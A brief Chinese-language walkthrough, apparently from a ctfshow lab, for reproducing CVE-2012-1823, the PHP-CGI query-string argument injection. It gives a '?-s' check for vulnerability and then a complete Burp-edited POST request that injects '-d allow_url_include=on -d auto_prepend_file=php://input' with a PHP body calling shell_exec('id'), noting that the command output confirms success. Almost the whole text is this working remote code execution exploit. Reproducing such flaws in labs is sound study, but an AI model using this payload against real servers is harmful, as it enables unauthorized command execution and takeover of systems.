CVE-2012-1823详细介绍
漏洞复现(靶场为ctfshow)
利用
http://url/index.php?-s
判断是否存在漏洞
若出现源码组存在
bp抓包按下面修改
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
<?php echo shell_exec("id"); ?>
发送后会出现id
表明利用成功
